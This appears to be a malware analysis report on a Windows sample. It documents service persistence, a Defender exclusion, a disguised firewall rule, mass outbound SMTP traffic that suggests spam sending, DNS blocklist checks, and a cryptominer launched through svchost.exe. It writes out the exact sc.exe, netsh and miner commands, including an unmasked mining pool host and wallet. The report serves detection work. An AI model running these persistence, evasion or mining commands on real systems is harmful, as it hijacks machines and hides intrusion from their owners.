Technical Information
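Persistence: the sample registers itself as the Windows service 'helhagu' (Start = 2 is the automatic start type), with ImagePath pointing at a copy of itself under %WINDIR%\SysWOW64\helhagu:
- [<HKLM>\System\CurrentControlSet\Services\helhagu] 'Start' = '00000002'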
- [<HKLM>\System\CurrentControlSet\Services\helhagu] 'ImagePath' = '%WINDIR%\SysWOW64\helhagu\zlndpgvs.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\helhagu] 'ImagePath' = '%WINDIR%\SysWOW64\helhagu\zlndpgvs.exe'
- 'helhagu' %WINDIR%\SysWOW64\helhagu\zlndpgvs.exe /d"<Full path to file>"
- 'helhagu' %WINDIR%\SysWOW64\helhagu\zlndpgvs.exe
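Defense evasion: a Windows Defender path exclusion is added for the install directory, and an inbound firewall allow rule is created for svchost.exe under a name that resembles a built-in Windows entry:
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\helhagu' = '00000000'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul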
- %WINDIR%\syswow64\svchost.exe
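File system changes: files created, then the move into the install directory. The second entry uses path:stream syntax, i.e. an NTFS alternate data stream named .repos attached to the systemprofile directory, which ordinary directory listings do not show:
- %TEMP%\zlndpgvs.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
- from %TEMP%\zlndpgvs.exe to %WINDIR%\syswow64\helhagu\zlndpgvs.exe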
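Network endpoints contacted (host:port). '#' stands for characters masked in this report, so masked entries are partial and cannot be matched exactly. Most entries are port 25 on what appear to be mail exchangers of ordinary mail providers and organisations, i.e. destinations of outbound SMTP from the infected host rather than attacker infrastructure. The useful signal is therefore a non-mail host opening SMTP sessions to many unrelated MX servers, not the individual hostnames. The entries on ports 10060, 443, 418 and 482 are the ones that stand apart from that pattern:
- 'mi##########m.mail.protection.outlook.com':25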
- 'ma###.cmbchina.com':25
- 'mx#.###group.iphmx.com':25
- 'ma##.ttmail.com':25
- 'mx.##.#tinternet.com':25
- 'mx#.###803-69.iphmx.com':25
- 'mx.####o.locaweb.com.br':25
- 'ba#####da.cromcorp.com':25
- 'mx.##ndex.net':25
- 'fa###ool.xyz':10060
- 'eu#.###.#rotection.outlook.com':25
- 'alt1.gmail-smtp-in.l.google.com':25
- 'mx#.#ate.com':25
- 'mx#.###.#ailpod9-cph3.one.com':25
- 'mt##.##0.yahoodns.net':25
- 'ma##.##ctorpitangu.com':25
- 'fi########.mail.protection.outlook.com':25
- 'mx#######c02.gslb.pphosted.com':25
- 'ki##########-br.mail.protection.outlook.com':25
- 'ma##.#istayatak.com':25
- 'mx#.###ay.renater.fr':25
- 'ma##.#ortruck.com':25
- 'sp#####l2-5.vistec.net':25
- 'ma##.#ohabcp.com.br':25
- '15#.#40.201.174':443
- 'al############com-br.mail.protection.outlook.com':25
- 'ma##.#rdakostum.com':25
- 'mx#######f01.gslb.pphosted.com':25
- 'ge##########cl.mail.protection.outlook.com':25
- 'mq##.#indowsliv.com':25
- 'mx##.#-online.de':25
- '52.##3.241.7':443
- 'mx#.cvk.lv':25
- 'mb####.mynet.com':25
- 'em##.freenet.de':25
- 'ni#####b.nilko.com.br':25
- 'mx##.###stechservices.net':25
- 'mx#.#harter.net':25
- 'mx#######b01.gslb.pphosted.com':25
- 'google.com':80
- '17#.#13.115.157':418
- '17#.#13.115.156':418
- '80.#6.75.4':418
- '17#.#13.115.155':418
- 'mx#######001.gslb.pphosted.com':25
- '17#.#13.115.154':418
- 'ng#.#erim.net':25
- 'mx###.##tsol.xion.oxcs.net':25
- 'alt1.aspmx.l.google.com':25
- 'mx#######.mail.am0.yahoodns.net':25
- '80.##.75.254':482
- 'sv####lfheim.top':443
- '17#.#13.115.153':418
- 'mx####.##il.gm0.yahoodns.net':25
- 'sp######01.nex-killspam.com':25
- 'ff######x-vip2.prodigy.net':25
- 'mx#.free.fr':25
- 'mx#######a04.gslb.pphosted.com':25
- 'mx#######602.gslb.pphosted.com':25
- 'mx#######403.gslb.pphosted.com':25
- 'mx#.##l.iphmx.com':25
- 'sp#####an.isomedia.com':25
- 'mg###.#edia-general.com':25
- 'mx#######501.gslb.pphosted.com':25
- 'mx.###dmatic.com':25
- 'mx.###m.kgslb.com':25
- 'mx#.##ailsrvr.com':25
- 'mx.########l.com.cust.b.hostedemail.com':25
- 'mx#######601.gslb.pphosted.com':25
- 'mx######b2d01.pphosted.com':25
- 'mx#######d01.gslb.pphosted.com':25
- 'cl######n-03.mbs.boeing.net':25
- 'fo###ne.dago.cz':25
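HTTP request (together with the google.com:80 connection above, possibly a connectivity check):
- http://www.google.com/
Connection endpoints, second listing in the source (largely repeats the entries above):
- 'sv####lfheim.top':443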
- 'fa###ool.xyz':10060
- 'ma##.##ctorpitangu.com':25
- 'mx.##ndex.net':25
- 'mx.##.#tinternet.com':25
- 'mx#.###803-69.iphmx.com':25
- 'mx#.###group.iphmx.com':25
- 'fi########.mail.protection.outlook.com':25
- 'mx#######.mail.am0.yahoodns.net':25
- 'mb####.mynet.com':25
- 'mx#.cvk.lv':25
- 'ki##########-br.mail.protection.outlook.com':25
- 'mq##.#indowsliv.com':25
- 'ma##.#rdakostum.com':25
- '15#.#40.201.174':443
- 'ma##.#ortruck.com':25
- 'sp#####l2-5.vistec.net':25
- 'mx#.###.#ailpod9-cph3.one.com':25
- 'eu#.###.#rotection.outlook.com':25
- 'mt##.##0.yahoodns.net':25
- 'mx##.###stechservices.net':25
- 'cl######n-03.mbs.boeing.net':25
- '17#.#13.115.154':418
- '80.#6.75.4':418
- '17#.#13.115.153':418
- '17#.#13.115.156':418
- '17#.#13.115.157':418
- '17#.#13.115.155':418
- 'alt1.aspmx.l.google.com':25
- 'ma##.#istayatak.com':25
- '52.##3.241.7':443
- 'ng#.#erim.net':25
- 'sp######01.nex-killspam.com':25
- 'ff######x-vip2.prodigy.net':25
- 'mx#######d01.gslb.pphosted.com':25
- 'aspmx.l.google.com':25
- 'mx.###m.kgslb.com':25
- 'sp#####an.isomedia.com':25
- 'alt2.aspmx.l.google.com':25
- '80.##.75.254':482
- 'mx####.##il.gm0.yahoodns.net':25
- 'ni#####b.nilko.com.br':25
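DNS queries issued. Besides lookups of mail domains and their MX hosts, the list contains queries for one masked IPv4 address under dnsbl.sorbs.net, bl.spamcop.net, zen.spamhaus.org, sbl-xbl.spamhaus.org and cbl.abuseat.org, plus an in-addr.arpa reverse lookup. These are DNS blocklist checks, presumably of the infected host's own public address:
- DNS ASK mi##########m.mail.protection.outlook.com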
- DNS ASK bl####ngarians.com
- DNS ASK ca###oup.com
- DNS ASK mx#.###group.iphmx.com
- DNS ASK ca####lliance.com
- DNS ASK cm###ina.com
- DNS ASK ma###.cmbchina.com
- DNS ASK tt##il.com
- DNS ASK ma##.ttmail.com
- DNS ASK cr###orp.com
- DNS ASK dr##.com
- DNS ASK sf####amarca.gov.ar
- DNS ASK jx####.#wtybk.r.mrcx.com
- DNS ASK ad#.##ilce.unesp.br
- DNS ASK fi#.edu.br
- DNS ASK fi########.mail.protection.outlook.com
- DNS ASK ba#####da.cromcorp.com
- DNS ASK de##riv.com
- DNS ASK mx.##.#tinternet.com
- DNS ASK bt###ernet.com
- DNS ASK mx#.###803-69.iphmx.com
- DNS ASK mx#.#ate.com
- DNS ASK gm##l.com
- DNS ASK alt1.gmail-smtp-in.l.google.com
- DNS ASK li#e.se
- DNS ASK eu#.###.#rotection.outlook.com
- DNS ASK fa###ool.xyz
- DNS ASK am###trade.com
- DNS ASK na##.com
- DNS ASK do####pitangu.com
- DNS ASK ze####cilevent.com
- DNS ASK mx.##ndex.net
- DNS ASK tn#.net
- DNS ASK sm###w.turk.net
- DNS ASK gl##o.com
- DNS ASK mx.####o.locaweb.com.br
- DNS ASK na###ederal.org
- DNS ASK ma##.##ctorpitangu.com
- DNS ASK wa##doo.nl
- DNS ASK fa####isa.com.br
- DNS ASK ol###.com.uy
- DNS ASK sr#.com
- DNS ASK al############com-br.mail.protection.outlook.com
- DNS ASK co###cp.com.br
- DNS ASK ma##.#ohabcp.com.br
- DNS ASK st######eater-wiesbaden.de
- DNS ASK sp#####l2-5.vistec.net
- DNS ASK be##buy.com
- DNS ASK bo###uck.com
- DNS ASK ma##.#ortruck.com
- DNS ASK co###icopy.com
- DNS ASK ac###itiers.fr
- DNS ASK mx#.###ay.renater.fr
- DNS ASK vi###yatak.com
- DNS ASK ma##.#istayatak.com
- DNS ASK na##ret.cl
- DNS ASK ni###.com.br
- DNS ASK ni#####b.nilko.com.br
- DNS ASK ce##sa.es
- DNS ASK al#####esilva.com.br
- DNS ASK ar###ostum.com
- DNS ASK ma##.#rdakostum.com
- DNS ASK mx#######f01.gslb.pphosted.com
- DNS ASK mx#######c02.gslb.pphosted.com
- DNS ASK te##a.es
- DNS ASK ki###aum.com.br
- DNS ASK ki##########-br.mail.protection.outlook.com
- DNS ASK my##t.com
- DNS ASK mb####.mynet.com
- DNS ASK cv#.lv
- DNS ASK mx#.cvk.lv
- DNS ASK ro###tmail.com
- DNS ASK t-##line.de
- DNS ASK mx##.#-online.de
- DNS ASK wi###wsliv.com
- DNS ASK mq##.#indowsliv.com
- DNS ASK ge###rmeria.cl
- DNS ASK ge##########cl.mail.protection.outlook.com
- DNS ASK li#e.de
- DNS ASK qu###omm.com
- DNS ASK da#o.cz
- DNS ASK mx#.###.#ailpod9-cph3.one.com
- DNS ASK ol##ich.se
- DNS ASK up##gon.com
- DNS ASK ca####a-asiapac.com
- DNS ASK sp######01.nex-killspam.com
- DNS ASK at#.net
- DNS ASK ff######x-vip2.prodigy.net
- DNS ASK ka##ic.com
- DNS ASK km#.com
- DNS ASK ve##zon.net
- DNS ASK mx####.##il.gm0.yahoodns.net
- DNS ASK ve###asia.com
- DNS ASK au#.ibm.com
- DNS ASK mx######b2d01.pphosted.com
- DNS ASK me###nger.com
- DNS ASK mx#######601.gslb.pphosted.com
- DNS ASK bi###ytel.com
- DNS ASK mx.########l.com.cust.b.hostedemail.com
- DNS ASK mx#######d01.gslb.pphosted.com
- DNS ASK ar###ncrete.com
- DNS ASK mx#######001.gslb.pphosted.com
- DNS ASK as####materials.com
- DNS ASK mx#######b01.gslb.pphosted.com
- DNS ASK 23#.###.#12.82.dnsbl.sorbs.net
- DNS ASK ye##m.net
- DNS ASK 23#.###.#12.82.bl.spamcop.net
- DNS ASK 23#.###.#12.82.zen.spamhaus.org
- DNS ASK 23#.###.##2.82.sbl-xbl.spamhaus.org
- DNS ASK 23#.###.#12.82.cbl.abuseat.org
- DNS ASK ng#.#erim.net
- DNS ASK sv####lfheim.top
- DNS ASK ro##rs.com
- DNS ASK re##tor.com
- DNS ASK alt1.aspmx.l.google.com
- DNS ASK hi#####supplyinc.com
- DNS ASK mx###.##tsol.xion.oxcs.net
- DNS ASK 23#.###.112.82.in-addr.arpa
- DNS ASK google.com
- DNS ASK ts##.org
- DNS ASK mx#######.mail.am0.yahoodns.net
- DNS ASK sn###allinc.com
- DNS ASK aspmx.l.google.com
- DNS ASK so####xstudio.com
- DNS ASK mx#.##ailsrvr.com
- DNS ASK mx#######a04.gslb.pphosted.com
- DNS ASK pi##man.us
- DNS ASK ib#.com
- DNS ASK pi####lecart.com
- DNS ASK on##ne.fr
- DNS ASK mx#.free.fr
- DNS ASK bo##ng.com
- DNS ASK cl######n-03.mbs.boeing.net
- DNS ASK ch##ter.net
- DNS ASK mx#.#harter.net
- DNS ASK ba###rweld.com
- DNS ASK mx##.###stechservices.net
- DNS ASK cs##.com
- DNS ASK al#####ruckcompany.com
- DNS ASK fr##net.de
- DNS ASK em##.freenet.de
- DNS ASK fr###ier.com
- DNS ASK un###udios.com
- DNS ASK mx#######602.gslb.pphosted.com
- DNS ASK pi####msoftware.com
- DNS ASK cr###erbmw.com
- DNS ASK ha##ail.net
- DNS ASK mx.###m.kgslb.com
- DNS ASK co###atic.com
- DNS ASK mx.###dmatic.com
- DNS ASK co######entertainment.com
- DNS ASK ep.com
- DNS ASK mx#######501.gslb.pphosted.com
- DNS ASK me####general.com
- DNS ASK mg###.#edia-general.com
- DNS ASK se##et.com
- DNS ASK sp#####an.isomedia.com
- DNS ASK dh#.com
- DNS ASK mx#.##l.iphmx.com
- DNS ASK ei##ff.com
- DNS ASK mx#######403.gslb.pphosted.com
- DNS ASK tl##it.com
- DNS ASK alt2.aspmx.l.google.com
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK fo###ne.dago.cz
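Processes started and commands run (the entries marked "with hidden window" are repeated further down without that note). The sc.exe lines create the service 'helhagu' with display name "wifi support" and description "wifi internet conection"; the misspelling is the sample's own string and is reproduced verbatim:
- '%WINDIR%\syswow64\helhagu\zlndpgvs.exe' /d"<Full path to file>"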
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\helhagu\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\zlndpgvs.exe" %WINDIR%\SysWOW64\helhagu\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create helhagu binPath= "%WINDIR%\SysWOW64\helhagu\zlndpgvs.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description helhagu "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start helhagu' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\helhagu\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\zlndpgvs.exe" %WINDIR%\SysWOW64\helhagu\
- '%WINDIR%\syswow64\sc.exe' create helhagu binPath= "%WINDIR%\SysWOW64\helhagu\zlndpgvs.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description helhagu "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start helhagu
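svchost.exe started with miner-style arguments: -o pool address (the unmasked form of the 'fa###ool.xyz':10060 entry in the connection list), -u account string, -p password, -a cn/half algorithm. A genuine svchost.exe is started with -k followed by a service group name and takes no -o/-u/-a options, so this command line is a detection signal on its own:
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half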